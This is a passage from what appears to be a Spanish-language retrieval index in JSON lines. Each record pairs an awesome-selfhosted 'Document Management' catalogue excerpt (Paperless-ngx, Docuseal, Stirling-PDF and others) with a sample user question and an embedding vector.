0.06908, 0.0289, 0.03189, -0.01896, -0.06594, 0.01467, -0.07706, -0.06828, 0.01763, 0.08764, -0.06803, -0.01525, 0.00084, -0.02688, 0.05764, 0.02678, -0.02676, 0.00024, -0.02728, 0.04294, 0.00494, 0.05202, 0.02631, -0.03558, 0.01257, -0.04524, -0.01651, 0.037, 0.02463, 0.026, -0.03225, -0.029, -0.01289, -0.02934, 0.02754, 0.00882, -0.03228, 0.01684, -0.10963, -0.03421, 0.02592, 0.00635, -0.05634, -0.00931, -0.03151, 0.04649, -0.05056, 0.02096, -0.01145]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "que programa me sirve para editar y fusionar archivos PDF directamente en el navegador", "v": [0.06196, -0.05163, -0.15451, -0.28609, 0.00456, -0.06897, 0.07002, -0.06541, 0.00103, -0.14466, -0.031, -0.10587, -0.0767, -0.12497, -0.01319, -0.09102, 0.14073, -0.06985, 0.05836, -0.02681, 0.08395, 0.03843, -0.00656, -0.11197, -0.02172, 0.0292, -0.07492, 0.02187, -0.04833, -0.07775, 0.03902, 0.00348, 0.11415, 0.00469, -0.12767, 0.06796, 0.09455, 0.06353, -0.05849, 0.03204, 0.00713, 0.05956, -0.09357, 0.15104, -0.04805, -0.02252, 0.04125, 0.03549, -0.02311, -0.01472, 0.04359, 0.02727, -0.07743, 0.14633, -0.06973, -0.0833, -0.00966, -0.21354, -0.02842, -0.00292, -0.00365, 0.05325, -0.01358, 0.00205, -0.05324, -0.02798, -0.03371, -0.00938, -0.0347, 0.08778, -0.03984, 0.06788, 0.0892, -0.05453, -0.13136, 0.04233, 0.0652, 0.00664, -0.03825, -0.02148, 0.23093, -0.06271, 0.00608, 0.05403, -0.06757, -0.05574, 0.04877, -0.01648, 0.00351, 0.01669, 0.027, 0.00496, 0.012, 0.0061, 0.03663, -0.09946, 0.09732, -0.08476, 0.01791, -0.00942, 0.03426, -0.00399, -0.04302, 0.08657, 0.0172, 0.0172, 0.02292, -0.02999, -0.0063, 0.14888, 0.10349, 0.00542, 0.00697, -0.06928, -0.06478, 0.02353, 0.03449, -0.07679, -0.03315, -0.14043, -0.11947, -0.02582, -0.0718, -0.0213, -0.03359, 0.07143, 0.05147, 0.1328, -0.13557, 0.04458, 0.04363, 0.00935, -0.08921, 0.0307, -0.05814, -0.05845, 0.0289, 0.02198, -0.0167, -0.01819, 0.07368, -0.03679, 0.02337, 0.08216, -0.00017, -0.04787, 0.05913, -0.0312, 0.00298, -0.12393, -0.00175, -0.1059, -0.03251, -0.03599, -0.08238, -0.00752, -0.00618, -0.00353, -0.02797, 0.04943, -0.05735, 0.03648, -0.02663, -0.0659, -0.04352, -0.06115, 0.00996, 0.02308, 0.0821, -0.00491, 0.04356, 0.00442, 0.02028, -0.07642, -0.01045, 0.07231, -0.01089, 0.02911, 0.07426, 0.02496, -0.01085, -0.02113, 0.05921, 0.07473, -0.07519, -0.04761, 0.01137, 0.0401, -0.04593, 0.02235, -0.04672, 0.02385, -0.05592, 0.02108, 0.02387, -0.02386, -0.043, 0.02491, 0.01262, -0.03413, 0.00895, -0.04498, -0.0033, -0.00762, 0.0388, 0.06418, 0.04654, -0.01915, 0.06919, 0.04367, -0.07453, -0.01331, 0.06785, 0.00592, -0.00177, -0.035, 0.04253, 0.03932, 0.03889, 0.05768, -0.00981, -0.07801, 0.03286, 0.01936, 0.07929, -0.04413, 0.0702, -0.01211, -0.03624, 0.02634, 0.00266, -0.05153, -0.02781, 0.02492, 0.00659, 0.02988, -0.00664, 0.04584, -0.03136, -0.05564, -0.02151, 0.06736, 0.0274, -0.03493, -0.0482, 0.01014, -0.03878, -0.07446, 0.0419, 0.01728, -0.06545, 0.03895, 0.02362, -0.01259, 0.00575, 0.01872]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "cual es una alternativa libre a DocuSign para firmar documentos digitalmente", "v": [0.00721, 0.06821, -0.03416, -0.05603, 0.10257, -0.06636, -0.03398, -0.0388, -0.15423, 0.02151, -0.02092, -0.21548, -0.03175, -0.21032, -0.00347, -0.07595, 0.13807, -0.11908, -0.03362, -0.06507, 0.08053, -0.01655, -0.02512, -0.09665, 0.03598, -0.20237, -0.06745, -0.01106, -0.01239, 0.05546, 0.15239, 0.01887, 0.01483, -0.05148, -0.01968, -0.00121, 0.05048, 0.06386, 0.06729, 0.0675, 0.00469, 0.11073, -0.07038, 0.15781, -0.13022, 0.02939, 0.01244, 0.10418, 0.04957, 0.02861, -0.04909, -0.0515, -0.07039, 0.07323, -0.07116, 0.04211, 0.18126, -0.05011, 0.02132, -0.11567, -0.11251, 0.02119, -0.05077, 0.0049, 0.0726, 0.03402, 0.01764, 0.05452, -0.07201, 0.05458, 0.02951, 0.01018, 0.02875, -0.05718, -0.06817, 0.00467, -0.07214, -0.11746, -0.00093, 0.08972, 0.05202, -0.02261, -0.03717, 0.04436, -0.03609, -0.10273, -0.06581, -0.0785, 0.03833, 0.00388, 0.1587, 0.05365, 0.045, 0.01144, 0.06788, -0.03585, 0.03771, 0.01034, -0.06799, 0.05001, 0.05398, 0.12174, -0.00474, -0.08191, -0.08815, -0.09198, -0.07413, -0.00859, -0.06146, 0.08737, -0.07286, 0.10263, -0.03181, 0.08228, -0.02954, -0.02832, 0.05194, 0.00261, -0.00639, -0.02599, 0.08588, -0.04763, -0.08374, -0.03713, 0.02651, 0.01251, -0.0228, -0.02018, -0.0514, 0.02441, 0.05929, 0.02127, -0.1464, -0.08644, -0.01583, 0.00891, 0.00274, -0.08051, 0.01043, -0.04087, 0.06143, -0.0775, 0.00554, 0.03184, 0.03833, -0.01841, -0.02853, -0.02301, -0.0759, -0.00114, -0.09022, -0.00597, -0.01916, 0.12317, -0.05965, -0.00029, 0.01731, -0.02715, -0.12018, 0.07411, 0.00763, -0.01151, -0.03353, 0.04986, -0.01825, -0.02277, -0.03265, -0.00126, -0.05624, -0.00176, 0.05785, 0.00472, -0.00279, -0.08479, 0.06095, -0.08627, 0.00627, -0.00803, 0.05897, -0.06129, -0.0747, 0.00895, -0.02248, 0.04341, -0.0012, 0.01662, 0.03248, -0.04713, 0.08519, -0.00261, -0.01077, 0.05234, -0.07283, -0.01564, -0.02733, -0.04572, -0.05976, -0.04044, 0.00308, -0.05238, -0.05839, -0.03175, -0.0465, -0.0299, 0.01345, 0.03419, -0.09024, 0.0429, -0.03522, 0.04043, 0.00934, -0.05562, 0.04218, 0.00403, -0.08832, -0.01205, -0.00459, 0.01124, -0.01782, -0.00369, 0.10674, -0.01958, 0.04667, -0.02546, 0.03997, -0.02379, 0.09866, 0.05453, -0.03485, -0.00884, 0.03523, 0.01647, -0.04069, 0.00161, 0.00459, 0.08542, 0.02718, -0.01357, -0.06554, -0.06575, 0.0437, 0.06559, -0.05489, 0.00324, -0.04245, -0.00214, -0.10171, 0.01163, 0.0054, -0.02399, 0.01832, 0.05029, 0.04623, -0.01626, 0.02591, -0.05618]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "con que puedo organizar y catalogar mis documentos de forma privada sin usar la nube", "v": [-0.02076, 0.05591, -0.15604, -0.1439, 0.01281, -0.05795, 0.01442, -0.01096, -0.21084, -0.11536, -0.16146, -0.13922, 0.0486, -0.05881, -0.13382, -0.04059, 0.09577, -0.16001, -0.01846, 0.06366, -0.01227, -0.02014, -0.06, 0.04262, -0.09699, -0.05017, 0.15762, -0.04802, -0.09544, -0.00123, -0.08752, 0.06192, 0.03482, -0.07865, 0.00627, 0.02664, -0.01645, -0.01667, -0.21107, 0.01475, -0.04112, 0.049, -0.12822, 0.22496, -0.00579, 0.03966, -0.0744, 0.07391, -0.04883, 0.07621, -0.07364, -0.04985, -0.05202, 0.09825, -0.05536, -0.1465, 0.01998, -0.06271, 0.06863, -0.04301, -0.12708, 0.03398, 0.00826, 0.02292, 0.05236, -0.00923, -0.05507, 0.00952, -0.12533, -0.02509, -0.01052, 0.04067, -0.01649, -0.00825, 0.03809, 0.04461, -0.03338, -0.00812, -0.02375, 0.1591, 0.02955, 0.07209, -0.04786, 0.07515, -0.11543, -0.08948, 0.04961, 0.01037, 0.10201, -0.01567, -0.0265, 0.00341, 0.00668, -0.00709, 0.01473, 0.00441, 0.02524, 0.10457, -0.02878, 0.00066, 0.04561, 0.06464, 0.00958, 0.02202, -0.05982, 0.00192, 0.04432, 0.00214, 0.02908, -0.02867, -0.08612, 0.00156, -0.05755, 0.08135, -0.01121, -0.10972, 0.05532, -0.03039, -0.04031, -0.00293, 0.01334, -0.0813, -0.00346, -0.03985, 0.06625, -0.03902, -0.00863, 0.09127, -0.04731, 0.0415, -0.04151, 0.02813, -0.06367, 0.00388, 0.04424, -0.0242, -0.17355, -0.12632, 0.08781, -0.04687, 0.03283, -0.03689, -0.07734, -0.01158, 0.07377, -0.04584, 0.01778, 0.00882, -0.02224, -0.06648, 0.01301, 0.00172, -0.01895, 0.03726, -0.09808, 0.06858, -0.02206, -0.00373, -0.05365, -0.02293, 0.01623, 0.03366, -0.05944, 0.04344, 0.06113, -0.07573, 0.0283, -0.01236, -0.01936, 0.07892, 0.02683, -0.02541, -0.0425, -0.09983, 0.05609, -0.03397, 0.00992, -0.05966, 0.07049, -0.00267, 0.01249, 0.02517, -0.03651, 0.02704, -0.06145, -0.02834, 0.04909, -0.03147, 0.03665, 0.01324, -0.00617, 0.05788, 0.01243, -0.00515, 0.01087, -0.0504, -0.08769, -0.02155, 0.00711, -0.03402, -0.02746, -0.00292, -0.0853, -0.02591, 0.0498, -0.01077, -0.09485, 0.05547, 0.01968, 0.03163, 0.01989, -0.05079, 0.03887, -0.0573, -0.06436, 0.03243, -0.00887, -0.03027, 0.006, -0.0334, 0.01302, 0.03588, 0.04898, -0.09776, 0.06425, -0.04176, -0.0057, 0.0582, 0.03323, 0.01865, -0.01951, 0.0387, 0.00511, -0.04107, 0.00622, 0.00625, 0.03966, -0.05842, -0.03696, -0.04603, -0.01769, 0.07988, -0.01895, 0.00247, -0.07873, -0.04416, -0.07805, 0.04574, 0.00386, -0.01156, 0.02928, 0.05382, 0.09549, -0.07244, 0.00413, -0.00587]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "que programa hay para gestionar documentos de forma electrΓ³nica y generar previsualizaciones?", "v": [-0.13191, 0.00978, -0.10828, -0.22705, 0.13422, -0.04622, 0.07746, -0.00879, -0.10422, -0.14713, -0.11808, -0.04547, 0.0657, -0.07791, 0.02232, 0.02988, 0.19092, -0.19191, -0.01277, 0.02808, -0.06021, 0.09467, 0.04886, -0.09797, -0.00342, -0.01778, -0.01369, -0.08126, -0.00657, 0.07901, 0.1127, 0.10578, 0.02892, -0.13237, -0.01541, 0.11224, 0.0606, 0.0817, -0.06571, 0.00702, 0.02694, -0.00212, -0.10132, 0.08548, 0.03689, -0.0064, 0.03146, 0.05573, 0.0242, -0.01963, -0.09279, 0.02092, -0.07206, 0.08199, -0.0135, -0.15069, 0.02634, -0.24906, 0.04217, -0.1161, -0.00187, 0.05649, 0.03251, 0.06364, 7e-05, 0.09171, 0.12442, -0.01096, -0.17246, 0.03562, -0.0401, 0.02141, 0.02018, -0.08299, 0.04581, -0.05024, -0.06126, 0.02011, -0.02034, 0.04711, -0.00792, 0.02602, -0.04916, 0.03335, -0.14939, -0.00435, 0.01801, 0.01398, -0.03874, -0.01139, 0.0011, 0.02651, -0.02284, -0.01784, 0.04848, -0.01489, 0.03038, 0.03224, -0.0355, 0.07679, 0.01094, -0.02586, -0.0461, 0.10302, -0.10479, 0.07722, 0.00936, -0.08522, 0.01522, 0.06351, -0.10139, 0.02928, 0.02752, 0.05959, -0.04299, 0.03062, 0.04365, -0.03088, 0.01749, -0.03407, -0.00415, -0.01505, 0.01182, -0.04901, 0.08713, -0.05563, -0.03799, 0.08134, -0.01204, 0.09812, 0.00592, -0.06971, -0.03614, 0.02219, -0.00875, -0.01843, -0.01081, -0.07219, 0.01234, -0.10888, -0.00588, 0.06225, -0.02243, -0.00812, 0.04416, -0.0582, 0.01589, -0.03128, -0.02011, 0.04201, -0.01915, -0.00344, -0.02231, 0.02605, -0.08986, 0.05376, -0.01801, 0.01834, -0.08085, -9e-05, -0.02288, 0.04451, -0.03618, 0.00139, 0.04021, -0.02935, 0.00785, 0.06948, 0.06607, 0.01011, 0.0028, 0.05284, 0.00282, -0.09844, 0.044, -0.08089, -0.05045, -0.07216, 0.0386, -0.0202, -0.09736, 0.05826, 0.03757, 0.08796, -0.10279, 0.01553, -0.00097, -0.01084, 0.00046, 0.01286, 0.03828, 0.06813, -0.07931, 0.03158, 0.04286, -0.04134, -0.04126, 0.0127, -0.00202, -0.01042, -0.07307, -0.05609, 0.00657, 0.00075, 0.04467, 0.07043, -0.07254, 0.00317, 0.03332, 0.06457, -0.04311, -0.05882, 0.05036, -0.01161, -0.08451, -0.06829, -0.00698, 0.01452, 0.0374, 0.0351, 0.05586, -0.01826, 0.03611, 0.02651, 0.04935, -0.05054, 0.07275, 0.04583, 0.02925, 0.00663, -0.04783, -0.01395, 0.02608, 0.03175, -0.00153, 0.02029, 0.0359, -0.06403, -0.09529, -0.11487, 0.01141, 0.07222, -0.0294, -0.05603, -0.05467, 0.01893, -0.0886, 0.03798, -0.00508, 0.00086, -0.02664, 0.01606, 0.03593, -0.01879, 0.03894, -0.0227]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "con quΓ© puedo montar un sistema de gestiΓ³n documental que incluya reconocimiento Γ³ptico de caracteres (OCR)?", "v": [0.14477, -0.03401, -0.03803, -0.19963, 0.02403, -0.10104, 0.05008, 0.10383, -0.10684, -0.04244, 0.02714, -0.12452, 0.07259, -0.14374, 0.05884, 0.02601, 0.09273, -0.07124, -0.10452, -0.04952, -0.09679, -0.07351, 0.05468, -0.01782, 0.01752, -0.02914, -0.09562, -0.08218, -0.00847, -0.04785, 0.06762, 0.1604, -0.02818, -0.03341, -0.05406, 0.05126, -0.09437, -0.071, 0.0012, 0.00813, -0.05443, -0.05066, 0.04047, 0.24462, 0.21971, -0.02007, -0.01018, 0.15316, -0.06785, -0.11906, 0.0113, -0.01417, -0.14025, 0.05311, 0.00671, -0.08905, 0.02728, 0.04248, 0.1299, -0.04116, 0.08419, 0.13651, -0.05701, -0.10326, 0.00438, 0.00847, 0.01248, 0.06046, -0.06166, 0.0163, -0.04162, 0.01429, 0.06655, 0.07731, 0.05593, 0.02078, 0.01352, -0.00692, 0.15209, -0.07753, 0.05, -0.04071, 0.01572, 0.03962, -0.03634, -0.00813, 0.04005, -0.00605, -0.01916, -0.07795, 0.00714, 0.08041, 0.05091, -0.03057, 0.04399, -0.03464, 0.0416, 0.06903, -0.11217, 0.06101, -0.13788, -0.01259, -0.0996, 0.08701, 0.03359, 0.04444, 0.08695, -0.08275, -6e-05, -0.06244, 0.01636, 0.08155, -0.05326, -0.02225, -0.06347, -0.00896, -0.00078, -0.03904, 0.00645, -0.00912, 0.00617, 0.03345, 0.0187, -0.05804, 0.12019, -0.04593, 0.04034, 0.09913, 0.0144, 0.01784, -0.01755, 0.03554, -0.09968, -0.07701, 0.02002, -0.01696, -0.00262, 0.01406, 0.00806, -0.0358, -0.03022, -0.055, 0.01538, 0.00259, 0.09039, -0.03421, -0.01792, -0.0398, -0.01183, 0.01609, -0.03552, 0.01674, 0.03778, -0.03769, -4e-05, -0.00752, 0.13782, -0.08481, -0.10148, 0.00791, 0.01603, 0.01028, -0.01587, 0.09275, 0.02199, 0.02124, -0.07231, -0.01253, 0.084, -0.00813, 0.00065, -0.02064, 0.06185, 0.01554, 0.04586, -0.05375, 0.00246, -0.06977, 0.07629, -0.01232, -0.02005, 0.06127, 0.03688, 0.03242, 0.00613, 0.00823, -0.04775, -0.00329, 0.02823, 0.054, 0.09705, -0.02239, 0.03485, 0.00568, -0.00331, -0.0522, -0.05232, -0.0669, 0.04578, -0.0043, -0.04003, 0.01206, 0.01848, -0.03827, 0.05156, 0.02152, -0.02046, 0.06938, 0.06608, 0.03917, 0.01333, -0.03097, 0.03547, 0.0005, -0.08241, 0.0148, -0.01596, 0.03763, -0.03501, -0.05829, 0.08866, -0.0549, 0.04964, 0.03463, 0.00521, -0.05351, 0.01714, 0.01581, -0.05867, -0.10203, -0.02696, -0.00267, -0.05627, -0.03251, 0.01902, 0.02885, -0.02758, -0.00119, 0.00758, -0.01663, 0.02974, 0.0688, -0.04087, 0.03314, -0.09534, -0.06476, -0.0575, 0.04224, 0.04994, -0.07102, -0.04026, 0.05556, 0.00972, -0.07717, -0.01613, -0.04071]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "cual es una alternativa libre a DocuSign para firmar documentos?", "v": [-0.01303, 0.08861, -0.02382, -0.06364, 0.12791, -0.06774, -0.00323, -0.07386, -0.14501, 0.02566, -0.0638, -0.14694, 0.00818, -0.16549, 0.01107, -0.04224, 0.14234, -0.1009, -0.03218, -0.01828, 0.07898, -0.01243, -0.03429, -0.04495, 0.0191, -0.19835, -0.06759, -0.01258, 0.01662, 0.01815, 0.1221, 0.0246, 0.03415, -0.04024, -0.01933, 0.05235, 0.02991, 0.0344, 0.05801, 0.08587, -0.01348, 0.08909, -0.07921, 0.13153, -0.16176, 0.03183, -0.00249, 0.11217, 0.05776, 0.03229, -0.04029, -0.07704, -0.03746, 0.04627, -0.07143, 0.05192, 0.17247, -0.02705, -0.02461, -0.10174, -0.10671, -0.00187, -0.04471, -0.0111, 0.06329, -0.00087, 0.00508, 0.07284, 0.0023, 0.04264, 0.00268, -0.00095, 0.03681, -0.0678, -0.082, -0.00224, -0.07375, -0.12235, 0.02152, 0.15263, 0.04699, -0.02678, -0.09085, 0.02551, -0.00337, -0.08624, -0.05911, -0.06929, 0.04633, 0.00723, 0.16864, 0.01668, 0.03625, 0.0454, 0.06459, -0.03539, 0.01739, 0.01824, -0.03353, 0.02917, 0.04118, 0.12585, -0.00906, -0.06929, -0.06854, -0.09289, -0.09433, -0.01703, -0.07647, 0.10268, -0.04311, 0.11651, -0.01542, 0.09613, -0.02481, -0.04347, -0.00967, 0.01009, -0.03206, -0.01593, 0.0479, -0.03667, -0.11264, -0.04437, 0.02151, -0.0177, -0.03984, 0.00682, -0.05084, 0.06874, 0.05805, 0.03414, -0.16779, -0.0819, -0.03758, -0.01973, 0.03261, -0.09152, 0.00797, -0.03239, 0.07313, -0.09372, 0.00592, 0.06647, 0.06051, 0.00836, -0.0547, -0.02286, -0.06078, -0.01429, -0.07855, 0.00032, 0.00118, 0.13759, -0.04915, -0.02371, 0.05365, -0.00196, -0.10451, 0.07434, 0.02639, 0.00199, -0.04224, 0.0533, -0.02934, -0.01451, -0.04079, -0.02671, -0.06692, 0.00579, 0.08524, 0.00294, 0.01068, -0.07221, 0.0795, -0.11256, 0.02339, -0.01873, 0.04023, -0.07883, -0.0396, 0.03056, -0.03749, 0.0331, 0.00899, 0.00824, 0.03485, -0.0203, 0.10619, -0.01558, -0.04685, 0.0722, -0.04212, -0.0624, -0.05445, -0.01647, -0.04731, -0.08481, 0.00994, -0.04475, -0.05503, -0.02356, -0.06134, -0.0354, 0.01465, 0.01335, -0.11977, 0.05918, -0.02751, 0.03513, 0.01637, -0.02059, 0.04341, 0.00761, -0.07998, -0.00101, -0.00723, 0.01114, 0.00712, -0.00623, 0.09818, 0.00418, 0.0577, -0.03329, 0.03332, -0.05417, 0.08733, 0.05119, -0.03317, 0.01826, 0.04024, 0.03817, -0.03348, 0.00288, 0.02063, 0.0651, 0.01506, -0.02807, -0.01849, -0.08185, 0.05524, 0.06558, -0.07388, -0.03085, -0.06043, 0.01416, -0.06986, -0.00196, 0.0223, -0.03179, 0.01788, 0.05533, 0.06626, -0.02548, 0.05458, -0.09387]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: SeedDMS β€” Document Management System with workflows, access rights, fulltext search, and more [GPL-2.0, PHP]. Signature PDF β€” Sign and manipulate PDFs with collaboration, organization, compression and metadata editing [AGPL-3.0, PHP/deb/Docker]. SimpleDMS β€” Easy-to-use, metadata-driven, open-source document management system (DMS) for small businesses that sorts documents almost by itself [AGPL-3.0, Docker]. Stirling-PDF β€” Local hosted web application that allows you to perform various operations on PDF files, such as merging, splitting, file conversions and OCR [Apache-2.0, Docker/Java].", "indexar": "que programa puedo usar para organizar documentos y gestionar sus derechos de acceso", "v": [-0.03028, 0.12343, -0.12216, -0.31539, 0.07331, -0.05731, 0.04063, -0.02136, -0.18612, -0.04852, -0.14811, -0.1289, 0.01582, -0.15357, -0.01774, -0.05, 0.23512, -0.11403, -0.04485, 0.03132, -0.02855, 0.05312, 0.01441, 0.04909, -0.05577, -0.0613, 0.13149, -0.12079, 0.02158, -0.00766, 0.00591, -0.01069, 0.00926, -0.09567, 0.04276, 0.02358, 0.01493, 0.08478, -0.01878, 0.0319, -0.0612, 0.03246, -0.10262, 0.09721, 0.04514, 0.02763, 0.05554, 0.03152, -0.03289, -0.04007, -0.0318, -0.05189, -0.06109, 0.01924, -0.00201, -0.10343, -0.02446, -0.15957, -0.03379, -0.01168, -0.05894, 0.02656, 0.03899, 0.10787, 0.01558, 0.01307, 0.0903, 0.02128, -0.1158, 0.08695, -0.06157, 0.02181, 0.02141, -0.01647, 0.00868, -0.03282, -0.03583, -0.02662, 0.03228, 0.07139, -0.07213, 0.061, -0.02316, 0.0398, -0.12178, -0.1131, 0.05749, -0.04352, 0.01299, -0.059, 0.01889, 0.00974, -0.00321, -0.08751, 0.02476, -0.04209, 0.05095, 0.03875, 0.0341, -0.01048, -0.0048, -0.00888, -0.03669, 0.08736, -0.04896, 0.04353, 0.04122, -0.02607, -0.0158, 0.00581, -0.12526, 0.04995, -0.07576, 0.07914, -0.04568, -0.00156, 0.01087, -0.03046, 0.0065, -0.06208, -0.00283, -0.08452, 0.02067, 0.00256, 0.15109, -0.03314, 0.07837, 0.18339, -0.07834, 0.03708, -0.00708, -0.02795, -0.04333, -0.00678, -0.03517, -0.08872, -0.09719, -0.04951, 0.07338, -0.04005, -0.07294, 0.03624, -0.06823, -0.01276, 0.03378, -0.03034, -0.039, 0.00394, -0.01029, -0.03025, 0.0663, -0.07164, 0.03125, 0.0284, -0.03145, 0.0546, -0.036, -0.07, -0.10678, -0.04219, -0.09382, 0.01395, -0.06595, 0.06795, 0.07858, -0.04733, 0.05631, 0.00027, 0.0119, 0.02817, 0.01765, 0.06501, 0.07296, -0.03614, -0.00756, -0.09006, -0.00864, -0.07647, 0.07966, -0.00018, -0.02347, 0.04033, 0.01032, 0.0319, -0.03364, -0.00512, -0.02415, 0.03729, 0.00335, -0.01677, -0.00052, 0.08159, 0.03594, -0.02627, 0.02199, -0.0312, -0.07939, -0.01671, -0.00355, -0.01364, -0.04783, -0.01018, -0.02038, 0.01735, 0.06011, 0.05001, -0.0602, 0.03974, 0.02301, 0.07234, -0.01997, -0.04275, 0.05229, 0.01155, -0.15227, -0.02343, -0.02975, 0.02745, 0.02776, -0.02395, 0.03809, -0.00413, 0.01096, 0.00052, 0.06487, -0.10536, 0.06874, 0.02275, 0.02117, -0.00837, -0.01277, 0.03149, -0.01325, 0.00191, 0.00611, 0.00859, 0.01894, -0.06787, -0.01863, -0.04401, -0.02154, 0.10978, 0.00281, -0.0109, -0.04265, -0.00032, -0.06854, 0.02806, 0.00551, -0.00025, 0.01828, 0.02321, 0.08846, -0.04941, 0.00151, 0.01623]} -{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", 